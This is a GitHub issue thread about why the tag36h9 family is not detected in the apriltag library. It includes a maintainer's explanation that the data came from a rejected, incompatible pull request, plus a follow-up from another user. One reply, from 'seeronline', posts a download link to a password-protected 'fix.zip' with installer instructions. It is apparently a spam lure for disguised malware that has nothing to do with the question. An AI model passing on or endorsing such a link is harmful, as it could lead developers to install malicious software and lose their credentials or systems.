AprilRobotics/apriltag #344: Why can't tag36h9 be recognized?

tiantian500, 2024-08-26:
Hello!
Thank you very much for your work!

I have used the data from the commit c010a364f7f00efb59b7a36f22fe3ce427912cf2 in tag36h9.c as my code data, and also added the tag36h9 family in apriltag_pywrap.c, the version of apriltag I used is v3.3.0, and the compilation method refers to https://github.com/AprilRobotics/apriltag/blob/v3.3.0/README.md.

I am able to detect information using Python with tag36h11, but when I test an image of tag36h9, no results are recognized. My question is, is it an issue with the code data, or is the process of importing the new AprilTag family set up incorrectly?

[image]
[image]

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

tiantian500, 2024-08-28:
I have regenerated the datacode for tag36h9, and the issue has been resolved.

closed 2024-08-28 by tiantian500

christian-rauch, 2024-08-28:
> I have used the data from the commit [c010a36](https://github.com/AprilRobotics/apriltag/commit/c010a364f7f00efb59b7a36f22fe3ce427912cf2) in tag36h9.c as my code data

May I ask how you got to this commit? For reference, this commit is part of the closed/rejected PR https://github.com/AprilRobotics/apriltag/pull/12. https://github.com/AprilRobotics/apriltag/pull/12#issuecomment-471589164 already mentions that the generated tag is incompatible with the library. E.g. the generated tag there sets `tf->d = 6;` but in the current version of the library, the `apriltag_family` struct has no member `d`.

So, if you really have to use the `36h9` instead of `36h10` or `36h11`, you have to generate it manually and add it to your own source tree.

Alica-cmd, 2024-12-23:
> I have regenerated the datacode for tag36h9, and the issue has been resolved.

I have modified the source code as you suggested above and compiled it successfully, but I still can't detect the image of 36h9. How did you handle it afterwards

[image]